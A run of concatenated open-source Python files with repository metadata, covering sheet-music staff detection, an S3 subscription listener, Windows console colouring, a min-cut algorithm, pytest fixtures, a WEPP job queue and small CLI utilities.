return staffs_ys_list
def __get_first_staff_ys(self, vertical_offset):
# returns a tuple of the beginning and end y positions of the first staff
# found below the provided vertical_offset
midpoint = SheetImage.get_midpoint(self.image)
image_height = SheetImage.get_height(self.image)
staff_spacing_variance = 5
for y_root in range(vertical_offset+1, image_height-25):
current_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root, 20)
if not current_pixel_is_black:
continue # haven't found the first ledger line yet
# now we've possibly found the first ledger line
next_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root+1, 20)
if next_pixel_is_black:
continue # we're assuming for now all lines are 1px thick
# now we'll find the spacing between this ledger and the next one
ledger_spacing = 0
for y_spacing in range(y_root+1, image_height):
spacing_pixel_is_black = SheetImage.pixel_is_black(self.image, midpoint+1, y_spacing, 20)
if (spacing_pixel_is_black):
break # we found another ledger line
else:
ledger_spacing += 1 # we found another row of spacing
# now we must verify that the spacing can predict the next ledger lines
# firstly, verify that the expected ledger lines are black
num_non_black = 0
# make sure it's possible to fit a staff below
if (y_root + ledger_spacing * 4) > SheetImage.get_height(self.image):
                continue  # not enough room below for a full staff
# now we check if we're probably looking at a ledger line
# we'll make sure there's 5 ledger lines within the amount
# of space we analyze (ledger_spacing*5+5) (5 for threshold)
num_black = 0
num_pixels = ledger_spacing*(5)+staff_spacing_variance
for y_ledger in range(num_pixels):
pixel_value_is_black = SheetImage.pixel_is_black(self.image, midpoint, y_root+y_ledger, 20)
num_black += pixel_value_is_black
if (num_black != 5):
                continue  # wrong number of black pixels for a 5-line staff
# for now, we'll assume this is good enough to prove we found a staff
return (y_root-staff_spacing_variance, y_root+ledger_spacing*5+staff_spacing_variance)
return None # we couldn't find any staff
if __name__=="__main__":
s = SheetImage("../../bin/mary-had-a-little-lamb.gif")
notes = s.get_notes()
for i, note in enumerate(notes):
note.save(str(i)+".gif")
|
sfmckenrick/sight-parse
|
src/imaging/sheet_image.py
|
Python
|
mit
| 10,494
|
import json
import logging
import traceback
import urllib
from dart.context.locator import injectable
from dart.message.call import SubscriptionCall
from dart.model.subscription import SubscriptionState
_logger = logging.getLogger(__name__)
@injectable
class SubscriptionListener(object):
def __init__(self, subscription_broker, subscription_service, subscription_element_service, trigger_service,
subscription_batch_trigger_processor, emailer):
self._subscription_broker = subscription_broker
self._subscription_service = subscription_service
self._subscription_element_service = subscription_element_service
self._trigger_service = trigger_service
self._subscription_batch_trigger_processor = subscription_batch_trigger_processor
self._emailer = emailer
self._handlers = {
SubscriptionCall.GENERATE: self._handle_create_subscription_call
}
def await_call(self, wait_time_seconds=20):
self._subscription_broker.receive_message(self._handle_call, wait_time_seconds)
def _handle_call(self, message_id, message, previous_handler_failed):
if 'Subject' in message and message['Subject'] == 'Amazon S3 Notification':
handler = self._handle_s3_event
else:
call = message['call']
if call not in self._handlers:
raise Exception('no handler defined for call: %s' % call)
handler = self._handlers[call]
try:
handler(message_id, message, previous_handler_failed)
except Exception:
_logger.error(json.dumps(traceback.format_exc()))
    # message_id and previous_handler_failed are unused because the conditional insert makes this function idempotent
# noinspection PyUnusedLocal
def _handle_s3_event(self, message_id, message, previous_handler_failed):
""" :type message: dict """
# Helpful data to help understand this function:
#
# - http://docs.aws.amazon.com/AmazonS3/latest/dev/notification-content-structure.html
# - dart/tools/sample-s3event_sqs-message.json
#
for record in json.loads(message['Message'])['Records']:
if not record['eventName'].startswith('ObjectCreated:'):
continue
s3_path = 's3://' + record['s3']['bucket']['name'] + '/' + urllib.unquote(record['s3']['object']['key'])
size = record['s3']['object']['size']
for subscription in self._subscription_service.find_matching_subscriptions(s3_path):
if not subscription.data.nudge_id:
success = self._subscription_element_service.conditional_insert_subscription_element(
subscription, s3_path, size
)
if success:
self._trigger_service.evaluate_subscription_triggers(subscription)
def _handle_create_subscription_call(self, message_id, message, previous_handler_failed):
subscription = self._subscription_service.get_subscription(message['subscription_id'])
subscription = self._subscription_service.update_subscription_message_id(subscription, message_id)
if previous_handler_failed:
self._subscription_service.update_subscription_state(subscription, SubscriptionState.FAILED)
self._emailer.send_subscription_failed_email(subscription)
return
self._subscription_element_service.generate_subscription_elements(subscription)
self._trigger_service.evaluate_subscription_triggers(subscription)
self._emailer.send_subscription_completed_email(subscription)
|
RetailMeNotSandbox/dart
|
src/python/dart/message/subscription_listener.py
|
Python
|
mit
| 3,702
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
BLACK = 0
BLUE = 1
GREEN = 2
CYAN = 3
RED = 4
MAGENTA = 5
YELLOW = 6
GREY = 7
# from wincon.h
class WinStyle(object):
NORMAL = 0x00 # dim text, dim background
BRIGHT = 0x08 # bright text, dim background
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
class WinTerm(object):
def __init__(self):
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
self.set_attrs(self._default)
self._default_fore = self._fore
self._default_back = self._back
self._default_style = self._style
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
# and BRIGHT is overwritten by Style codes.
self._light = 0
def get_attrs(self):
return self._fore + self._back * 16 + (self._style | self._light)
def set_attrs(self, value):
self._fore = value & 7
self._back = (value >> 4) & 7
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
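    # Editor's worked example (not in the original source): attributes pack
    # as fore + back*16 + style, so RED text (4) on a GREY background (7)
    # with BRIGHT (0x08) gives 4 + 7*16 + 0x08 == 0x7C, and set_attrs(0x7C)
    # recovers _fore=4, _back=7, _style=0x08.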
def reset_all(self, on_stderr=None):
self.set_attrs(self._default)
self.set_console(attrs=self._default)
self._light = 0
def fore(self, fore=None, light=False, on_stderr=False):
if fore is None:
fore = self._default_fore
self._fore = fore
# Emulate LIGHT_EX with BRIGHT Style
if light:
self._light |= WinStyle.BRIGHT
else:
self._light &= ~WinStyle.BRIGHT
self.set_console(on_stderr=on_stderr)
def back(self, back=None, light=False, on_stderr=False):
if back is None:
back = self._default_back
self._back = back
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
if light:
self._light |= WinStyle.BRIGHT_BACKGROUND
else:
self._light &= ~WinStyle.BRIGHT_BACKGROUND
self.set_console(on_stderr=on_stderr)
def style(self, style=None, on_stderr=False):
if style is None:
style = self._default_style
self._style = style
self.set_console(on_stderr=on_stderr)
def set_console(self, attrs=None, on_stderr=False):
if attrs is None:
attrs = self.get_attrs()
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleTextAttribute(handle, attrs)
def get_position(self, handle):
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
        # Because Windows coordinates are 0-based
        # and win32.SetConsoleCursorPosition expects 1-based, adjust by one.
position.X += 1
position.Y += 1
return position
def set_cursor_position(self, position=None, on_stderr=False):
if position is None:
# I'm not currently tracking the position, so there is no default.
# position = self.get_position()
return
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleCursorPosition(handle, position)
def cursor_adjust(self, x, y, on_stderr=False):
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
position = self.get_position(handle)
adjusted_position = (position.Y + y, position.X + x)
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
def erase_screen(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the screen.
# 1 should clear from the cursor to the beginning of the screen.
# 2 should clear the entire screen, and move cursor to (1,1)
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
# get the number of character cells in the current buffer
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
# get number of character cells before current cursor position
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = cells_in_screen - cells_before_cursor
        elif mode == 1:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_before_cursor
elif mode == 2:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_in_screen
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
if mode == 2:
# put the cursor where needed
win32.SetConsoleCursorPosition(handle, (1, 1))
def erase_line(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the line.
# 1 should clear from the cursor to the beginning of the line.
# 2 should clear the entire line.
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
        elif mode == 1:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwCursorPosition.X
elif mode == 2:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwSize.X
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
def set_title(self, title):
win32.SetConsoleTitle(title)
|
deathsec/instagram-py
|
InstagramPy/colors/winterm.py
|
Python
|
mit
| 6,314
|
#! /usr/bin/env python3
import prime
from itertools import islice
description = """
Truncatable primes
Problem 37
The number 3797 has an interesting property. Being prime itself, it is possible to continuously remove digits from left to right, and remain prime at each stage: 3797, 797, 97, and 7. Similarly we can work from right to left: 3797, 379, 37, and 3.
Find the sum of the only eleven primes that are both truncatable from left to right and right to left.
NOTE: 2, 3, 5, and 7 are not considered to be truncatable primes.
"""
def isTruncatable(p):
if p < 10: return False
strp = str(p)
ps = [int(strp[i:]) for i in range(1, len(strp))] + [int(strp[:i]) for i in range(1, len(strp))]
return all(prime.isPrime(x) for x in ps)
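# Editor's worked example (not in the original): for p = 3797 the candidate
# list is ps = [797, 97, 7, 3, 37, 379]; every entry is prime, so
# isTruncatable(3797) holds, as the first assert below checks.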
assert(isTruncatable(3797))
assert(not isTruncatable(5))
assert(not isTruncatable(41))
truncatablePrimes = (p for p in prime.primes() if isTruncatable(p))
print(sum(islice(truncatablePrimes, 11)))
|
mbuhot/mbuhot-euler-solutions
|
python/problem-037.py
|
Python
|
mit
| 945
|
# Below is the minimum-cut algorithm
# for a given graph
# The implementation of this algorithm was developed by Raul Bernardo
# Rodas Herrera, on 20 September of the year 2013.
# The corresponding libraries are imported
# Library for graph handling.
# For obtaining random values
import random
#################################################
# This function modifies the graph, given a pair of nodes to contract
def contraer(grafo, nodo_1, nodo_2):
    # Merged nodes: here we sort the string that
    # holds the labels of the merged nodes
nuevo_nodo = "%s,%s" % (nodo_1, nodo_2)
nuevo_nodo = sorted([int(i) for i in nuevo_nodo.split(',')])
nuevo_nodo = ','.join(str(i) for i in nuevo_nodo)
    # List of the nodes that are kept and of those that are merged
nodos = grafo.nodes()
nodos_mantienen = set(nodos) - set([nodo_1]) - set([nodo_2])
nodos_mantienen = [i for i in nodos_mantienen]
#nodos_mantienen = [i for i in nodos if (i != nodo_1 and i != nodo_2)]
    # Create the contracted graph from the kept nodes
    contraccion = grafo.subgraph(nodos_mantienen)
    # Add the node that was merged/joined
# contraccion.add_node(nuevo_nodo)
    # Add the weighted edges of the new node.
    # This part builds a list with the weights of the nodes that
    # were merged.
    iterador = grafo.edges_iter(nbunch=[nodo_1, nodo_2], data="weight")
    # This line gathers the edges that belonged to the merged pair of nodes
lista_agregar = [(i[0], i[1], i[2]['weight'])
for i in iterador
if ([i[0], i[1]] != [nodo_1, nodo_2]
and [i[1], i[0]] != [nodo_1, nodo_2])]
    # Here the node names are replaced
lista_agregar = [(nuevo_nodo, tupla[1], tupla[2])
if (tupla[0] == nodo_1 or tupla[0] == nodo_2)
else (tupla[0], nuevo_nodo, tupla[2])
for tupla in lista_agregar]
    # Finally, the edge list is added
    contraccion.add_weighted_edges_from(lista_agregar)
    # Return the contracted graph
return contraccion
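# Editor's sketch (not in the original source): the merged-node labels built
# above are comma-joined sorted integers, so the contraction order does not
# change the label. A minimal, self-contained illustration:
def _ejemplo_etiqueta_fusionada(nodo_1, nodo_2):
    # same label-building steps as in contraer()
    nuevo_nodo = "%s,%s" % (nodo_1, nodo_2)
    nuevo_nodo = sorted([int(i) for i in nuevo_nodo.split(',')])
    return ','.join(str(i) for i in nuevo_nodo)
assert _ejemplo_etiqueta_fusionada("7,2", 5) == "2,5,7"
assert _ejemplo_etiqueta_fusionada(5, "7,2") == "2,5,7"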
################################################
def transformar_a_conj(elemento):
"""Esta funcion transforma el elemento rapidamente en un conjunto"""
if type(elemento) == str:
conjunto = set([int(i) for i in elemento.split(',')])
else:
conjunto = set([elemento])
return conjunto
# Function that checks membership
def chequeadora_pertenencia(arco_inicial, arco_chequear):
    # The condition starts out False, meaning the edge being checked should
    # not be part of the non-selectable list.
condicion = False
    # First, turn the nodes of "arco_chequear" into a set
conj_1 = transformar_a_conj(arco_chequear[0])
conj_2 = transformar_a_conj(arco_chequear[1])
    # The same, but with "arco_inicial"
subconj_1 = transformar_a_conj(arco_inicial[0])
subconj_2 = transformar_a_conj(arco_inicial[1])
    # Check whether the elements of "arco_inicial" are in "arco_chequear"
if subconj_1.issubset(conj_1) and subconj_2.issubset(conj_2):
condicion = True
elif subconj_2.issubset(conj_1) and subconj_1.issubset(conj_2):
condicion = True
return condicion
#################################################
# Here we define the function that generates a contracted graph
def contraer_hasta_2_nodos(grafo, arco_inicial=None):
    # Compute this parameter, which is the stopping condition
    num_vertices_grafo = len(grafo.nodes())
    # Flag indicating whether or not this is the first iteration
    primera_iteracion = True
    # While the number of vertices is strictly greater than 2, proceed:
while num_vertices_grafo > 2:
        # The following is the set from which the random edge is drawn; note
        # that the edge selected as arco_inicial is subtracted from it
        if primera_iteracion:
            # At the end of this iteration the flag is set to False
conjunto_eleccion_arco = set(grafo.edges()).difference(
[arco_inicial])
listado_seleccion = list(conjunto_eleccion_arco)
elem_rand = random.choice(listado_seleccion)
indice_arco_azar = grafo.edges().index(elem_rand)
primera_iteracion = False
        # Since we are now in the second iteration, or later
        else:
            # Create/clear listado_no_elegible
            listado_no_elegible = []
            # Here begin the corresponding modifications.
for arco in grafo.edges():
                # The name se_elige_arco may seem confusing; it really means
                # "chosen so as NOT to be selectable", which is why, when the
                # function returns True, the edge goes into the list of
                # non-selected edges.
se_elige_arco = chequeadora_pertenencia(arco_inicial,
arco)
if se_elige_arco:
listado_no_elegible.append(arco)
conjunto_eleccion_arco = set(grafo.edges()).difference(
listado_no_elegible)
listado_seleccion = list(conjunto_eleccion_arco)
elem_rand = random.choice(listado_seleccion)
indice_arco_azar = grafo.edges().index(elem_rand)
primera_iteracion = False
nodo_1 = grafo.edges()[indice_arco_azar][0]
nodo_2 = grafo.edges()[indice_arco_azar][1]
        # Contract the nodes of the chosen edge into ONE single node.
        # Remember that this updates the graph
        grafo = contraer(grafo, nodo_1, nodo_2)
        # Recompute this parameter, which is the stopping condition
        num_vertices_grafo = len(grafo.nodes())
    # Return the final graph
return grafo
#################################################
# Here we define the function; recall that G
# is a "graph" instance of the "networkX" type
def min_cut(grafo, num_iteraciones=1000, arco_inicial=None):
    # Weight of the initial cut; this stands in for infinity
    suma_corte_minimo = 9999999999999999
    # Initialize the set of cut edges as empty
    conj_arcos_cortados = set()
    ### THIS FOR LOOP IS PARALLELIZABLE ###
    # Number of iterations searching for the minimum value
for iteracion in range(num_iteraciones):
        # Contract the graph
        resultado = contraer_hasta_2_nodos(grafo, arco_inicial)
        # Weight sum of the resulting multigraph.
        iterador = resultado.edges_iter(data="weight")
        suma_corte = sum([i[2]["weight"] for i in iterador])
        # If this improves on the previous best value
        if suma_corte < suma_corte_minimo:
            # Cut weight
            suma_corte_minimo = suma_corte
            # Keep the best graph found so far
grafo_final = resultado
##################################################
    # Next, fill in the set of cut edges.
    # If the first of the two resulting nodes is an integer:
    nodo_1 = grafo_final.nodes()[0]
    nodo_2 = grafo_final.nodes()[1]
    if type(nodo_1) == int:
        # the second one is necessarily a string
conj_arcos_cortados = set(
[tuple(sorted((nodo_1, int(i))))
for i in nodo_2.split(',')])
    # if it is not an integer, then it is a string
    else:
        # in that case the second one may be an integer
        if type(nodo_2) == int:
            # in which case the same idea as in the first "if" applies
conj_arcos_cortados = set(
[tuple(sorted((int(i), nodo_2)))
for i in nodo_1.split(',')])
        # on the other hand, if it is also a string
else:
conj_arcos_cortados = set(
[tuple(sorted((int(i), int(j))))
for i in nodo_1.split(',')
for j in nodo_2.split(',')])
    # Assign new attributes
grafo_final.Suma_corte_minimo = suma_corte_minimo
grafo_final.conj_arcos_cortados = conj_arcos_cortados
return grafo_final
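# Editor's usage sketch (assumes the networkx 1.x API the code above relies
# on, e.g. edges_iter(); values are illustrative):
#   import networkx as nx
#   G = nx.Graph()
#   G.add_weighted_edges_from([(1, 2, 1), (2, 3, 1), (3, 4, 1), (4, 1, 1)])
#   resultado = min_cut(G, num_iteraciones=100)
#   resultado.Suma_corte_minimo    # weight of the best cut found (2 here)
#   resultado.conj_arcos_cortados  # e.g. set([(1, 2), (3, 4)])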
|
BRodas/k-cut
|
lib_python/Min_Cut_Kargers.py
|
Python
|
mit
| 8,073
|
import pytest
import chainerx.testing
from chainerx_tests import cuda_utils
def pytest_configure(config):
_register_cuda_marker(config)
def pytest_runtest_setup(item):
_setup_cuda_marker(item)
def pytest_runtest_teardown(item, nextitem):
current_device = cuda_utils.get_current_device()
assert current_device is None or current_device == 0
def pytest_generate_tests(metafunc):
marker = [
m for m in metafunc.definition.iter_markers()
if m.name == 'parametrize_device']
if marker:
marker, = marker # asserts len == 1
device_names, = marker.args
metafunc.parametrize('device', device_names, indirect=True)
def _register_cuda_marker(config):
config.addinivalue_line(
'markers',
'cuda(num=1): mark tests needing the specified number of NVIDIA GPUs.')
def _setup_cuda_marker(item):
"""Pytest marker to indicate number of NVIDIA GPUs required to run the test.
Tests can be annotated with this decorator (e.g., ``@pytest.mark.cuda``) to
declare that one NVIDIA GPU is required to run.
Tests can also be annotated as ``@pytest.mark.cuda(2)`` to declare number
of NVIDIA GPUs required to run. When running tests, if
    ``CHAINERX_TEST_CUDA_DEVICE_LIMIT`` environment variable is set to a value
    greater than or equal to 0, test cases that require more GPUs than the
    limit will be skipped.
"""
cuda_marker = [m for m in item.iter_markers() if m.name == 'cuda']
if cuda_marker:
cuda_marker, = cuda_marker # asserts len == 1
required_num = cuda_marker.args[0] if cuda_marker.args else 1
if cuda_utils.get_cuda_limit() < required_num:
pytest.skip('{} NVIDIA GPUs required'.format(required_num))
def _get_required_cuda_devices_from_device_name(device_name):
# Returns the number of required CUDA devices to run a test, given a
# device name. If the device is non-CUDA device, 0 is returned.
s = device_name.split(':')
assert len(s) == 2
if s[0] != 'cuda':
return 0
return int(s[1]) + 1
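# Editor's sanity check (not in the original): device names follow the
# '<backend>:<index>' convention parsed above.
assert _get_required_cuda_devices_from_device_name('cuda:1') == 2
assert _get_required_cuda_devices_from_device_name('native:0') == 0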
@pytest.fixture
def device(request):
# A fixture to wrap a test with a device scope, given a device name.
# Device instance is passed to the test.
device_name = request.param
# Skip if the device is CUDA device and there's no sufficient CUDA devices.
cuda_device_count = _get_required_cuda_devices_from_device_name(
device_name)
if cuda_device_count > cuda_utils.get_cuda_limit():
pytest.skip()
device = chainerx.get_device(device_name)
device_scope = chainerx.using_device(device)
def finalize():
device_scope.__exit__()
request.addfinalizer(finalize)
device_scope.__enter__()
return device
@pytest.fixture(params=chainerx.testing.all_dtypes)
def dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.float_dtypes)
def float_dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.signed_dtypes)
def signed_dtype(request):
return request.param
@pytest.fixture(params=chainerx.testing.numeric_dtypes)
def numeric_dtype(request):
return request.param
@pytest.fixture(params=[True, False])
def is_module(request):
return request.param
_shapes = [
(),
(0,),
(1,),
(2, 3),
(1, 1, 1),
(2, 0, 3),
]
_shapes_as_sequence_or_int = (
_shapes
+ [[], [0]] # shape as a list instead of tuple
+ [0, 1, 5])
@pytest.fixture(params=_shapes)
def shape(request):
return request.param
@pytest.fixture(params=_shapes_as_sequence_or_int)
def shape_as_sequence_or_int(request):
return request.param
|
okuta/chainer
|
tests/chainerx_tests/conftest.py
|
Python
|
mit
| 3,665
|
"""Place jobs into our DEP queue!"""
import sys
import os
import datetime
import time
from io import StringIO
import pika
from pyiem.util import get_dbconn, logger
YEARS = datetime.date.today().year - 2006
class WeppRun:
"""Represents a single run of WEPP.
Filenames have a 51 character restriction.
"""
def __init__(self, huc12, fpid, clifile, scenario):
"""We initialize with a huc12 identifier and a flowpath id"""
self.huc12 = huc12
self.huc8 = huc12[:8]
self.subdir = f"{huc12[:8]}/{huc12[8:]}"
self.fpid = fpid
self.clifile = clifile
self.scenario = scenario
def _getfn(self, prefix):
"""boilerplate code to get a filename."""
return (
f"/i/{self.scenario}/{prefix}/{self.subdir}/"
f"{self.huc12}_{self.fpid}.{prefix}"
)
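    # Editor's example (hypothetical identifiers, not in the original): with
    # scenario 0, huc12 "090201081101" and fpid 42, self._getfn("env")
    # yields "/i/0/env/09020108/1101/090201081101_42.env".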
def get_wb_fn(self):
"""Return the water balance filename for this run"""
return self._getfn("wb")
def get_env_fn(self):
"""Return the event filename for this run"""
return self._getfn("env")
def get_ofe_fn(self):
"""Return the filename used for OFE output"""
return self._getfn("ofe")
def get_man_fn(self):
"""Return the management filename for this run"""
return self._getfn("man")
def get_slope_fn(self):
"""Return the slope filename for this run"""
return self._getfn("slp")
def get_soil_fn(self):
"""Return the soil filename for this run"""
return self._getfn("sol")
def get_clifile_fn(self):
"""Return the climate filename for this run"""
return self.clifile
def get_runfile_fn(self):
"""Return the run filename for this run"""
return self._getfn("run")
def get_yield_fn(self):
"""Filename to be used for yield output"""
return self._getfn("yld")
def get_event_fn(self):
"""Filename to be used for event output"""
return self._getfn("event")
def get_crop_fn(self):
"""Filename to be used for crop output."""
return self._getfn("crop")
def get_graphics_fn(self):
"""Filename to be used for crop output."""
return self._getfn("grph")
def make_runfile(self):
"""Create a runfile for our runs"""
out = StringIO()
out.write("E\n") # English units
out.write("Yes\n") # Run Hillslope
out.write("1\n") # Continuous simulation
out.write("1\n") # hillslope version
out.write("No\n") # pass file output?
out.write("1\n") # abbreviated annual output
out.write("No\n") # initial conditions output
out.write("/dev/null\n") # soil loss output file
out.write("Yes\n") # Do water balance output
out.write(f"{self.get_wb_fn()}\n") # water balance output file
out.write("No\n") # crop output
# out.write("%s\n" % (self.get_crop_fn(),)) # crop output file
out.write("No\n") # soil output
out.write("No\n") # distance and sed output
if self.huc12 in ["090201081101", "090201081102", "090201060605"]:
out.write("Yes\n") # large graphics output
out.write(f"{self.get_graphics_fn()}\n")
else:
out.write("No\n") # large graphics output
out.write("Yes\n") # event by event output
out.write(f"{self.get_env_fn()}\n") # event file output
out.write("No\n") # element output
# out.write("%s\n" % (self.get_ofe_fn(),))
out.write("No\n") # final summary output
out.write("No\n") # daily winter output
out.write("Yes\n") # plant yield output
out.write(f"{self.get_yield_fn()}\n") # yield file
out.write(f"{self.get_man_fn()}\n") # management file
out.write(f"{self.get_slope_fn()}\n") # slope file
out.write(f"{self.get_clifile_fn()}\n") # climate file
out.write(f"{self.get_soil_fn()}\n") # soil file
out.write("0\n") # Irrigation
out.write(f"{YEARS}\n") # years 2007-
out.write("0\n") # route all events
out.seek(0)
return out.read()
def main(argv):
"""Go main Go."""
scenario = int(argv[1])
log = logger()
myhucs = []
if os.path.isfile("myhucs.txt"):
log.warning("Using myhucs.txt to filter job submission")
with open("myhucs.txt", encoding="ascii") as fh:
myhucs = [s.strip() for s in fh]
idep = get_dbconn("idep")
icursor = idep.cursor()
icursor.execute(
"SELECT huc_12, fpath, climate_file from flowpaths "
"where scenario = %s",
(scenario,),
)
totaljobs = icursor.rowcount
connection = pika.BlockingConnection(
pika.ConnectionParameters(host="iem-rabbitmq.local")
)
channel = connection.channel()
channel.queue_declare(queue="dep", durable=True)
sts = datetime.datetime.now()
for row in icursor:
if myhucs and row[0] not in myhucs:
continue
wr = WeppRun(row[0], row[1], row[2], scenario)
channel.basic_publish(
exchange="",
routing_key="dep",
body=wr.make_runfile(),
properties=pika.BasicProperties(
delivery_mode=2 # make message persistent
),
)
# Wait a few seconds for the dust to settle
time.sleep(10)
percentile = 1.0001
while True:
now = datetime.datetime.now()
cnt = channel.queue_declare(
queue="dep", durable=True
).method.message_count
done = totaljobs - cnt
if (cnt / float(totaljobs)) < percentile:
log.info(
"%6i/%s [%.3f /s]",
cnt,
totaljobs,
done / (now - sts).total_seconds(),
)
percentile -= 0.1
if (now - sts).total_seconds() > 36000:
log.error("ERROR, 10 Hour Job Limit Hit")
break
if cnt == 0:
log.info("%s Done!", now.strftime("%H:%M"))
break
time.sleep(30)
connection.close()
if __name__ == "__main__":
main(sys.argv)
|
akrherz/dep
|
scripts/RT/enqueue_jobs.py
|
Python
|
mit
| 6,180
|
from .toolkit_tests import ToolkitTests
|
DarkmatterVale/regex4dummies
|
regex4dummies/tests/toolkit_tests/__init__.py
|
Python
|
mit
| 40
|
"""
Created on 22 Jun 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import optparse
from scs_core.display.display_conf import DisplayConf
# --------------------------------------------------------------------------------------------------------------------
class CmdDisplayConf(object):
"""
unix command line handler
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self):
self.__parser = optparse.OptionParser(usage="%prog [{ [-m MODE] [-n NAME] [-u STARTUP] [-s SHUTDOWN] "
"[-t { 1 | 0 }] | -d }] [-v]", version="%prog 1.0")
# optional...
self.__parser.add_option("--mode", "-m", type="string", nargs=1, action="store", dest="mode",
help="set display mode (SYS only)")
self.__parser.add_option("--name", "-n", type="string", nargs=1, action="store", dest="name",
help="set device name")
self.__parser.add_option("--startup", "-u", type="string", nargs=1, action="store", dest="startup",
help="set startup message")
self.__parser.add_option("--shutdown", "-s", type="string", nargs=1, action="store", dest="shutdown",
help="set shutdown message")
self.__parser.add_option("--show-time", "-t", type="int", nargs=1, action="store", dest="show_time",
help="show current time")
self.__parser.add_option("--delete", "-d", action="store_true", dest="delete", default=False,
help="delete display configuration")
self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
help="report narrative to stderr")
self.__opts, self.__args = self.__parser.parse_args()
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self):
if self.set() and self.delete:
return False
if self.mode is not None and self.mode not in DisplayConf.modes():
return False
return True
def is_complete(self):
if self.mode is None or self.device_name is None or \
self.startup_message is None or self.shutdown_message is None or self.show_time is None:
return False
return True
def set(self):
return self.mode is not None or self.device_name is not None or \
self.startup_message is not None or self.shutdown_message is not None or self.show_time is not None
# ----------------------------------------------------------------------------------------------------------------
@property
def mode(self):
return self.__opts.mode
@property
def device_name(self):
return self.__opts.name
@property
def startup_message(self):
return self.__opts.startup
@property
def shutdown_message(self):
return self.__opts.shutdown
@property
def show_time(self):
return None if self.__opts.show_time is None else bool(self.__opts.show_time)
@property
def delete(self):
return self.__opts.delete
@property
def verbose(self):
return self.__opts.verbose
# ----------------------------------------------------------------------------------------------------------------
def print_help(self, file):
self.__parser.print_help(file)
def __str__(self, *args, **kwargs):
return "CmdDisplayConf:{mode:%s, device_name:%s, startup_message:%s, shutdown_message:%s, show_time:%s, " \
"delete:%s, verbose:%s}" % \
(self.mode, self.device_name, self.startup_message, self.shutdown_message, self.show_time,
self.delete, self.verbose)
|
south-coast-science/scs_mfr
|
src/scs_mfr/cmd/cmd_display_conf.py
|
Python
|
mit
| 4,026
|
""" smashlib.inputsplitter
"""
import re
import os
ope = os.path.exists
from IPython.core.inputsplitter import IPythonInputSplitter
r_ed = 'ed [^:]*'
class SmashInputSplitter(IPythonInputSplitter):
""" It may be useful for something else in the future, but at the moment
Smash overrides the core IPythonInputSplitter for just one reason:
We want to force commands like "ed /some/path/file_name.txt:<col>:"
    to be interpreted as complete input. The use case is that
this format is often used as output for command line tools (for
instance ack-grep)
"""
def push(self, lines):
result = super(SmashInputSplitter, self).push(lines)
lines = lines.strip()
match = re.compile(r_ed).match(lines)
if match:
fname = match.group().split()[1]
if ope(fname):
self.source += '\n'
return result
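# Editor's sketch (hypothetical path, not in the original): for the input
# "ed /tmp/notes.txt:12:", the r_ed pattern matches "ed /tmp/notes.txt",
# the filename "/tmp/notes.txt" is extracted, and if it exists a newline is
# appended to self.source so IPython treats the input as complete.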
|
mattvonrocketstein/smash
|
smashlib/inputsplitter.py
|
Python
|
mit
| 922
|
#!/usr/bin/env python
#Copyright (c) 2016 Ramnatthan Alagappan
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
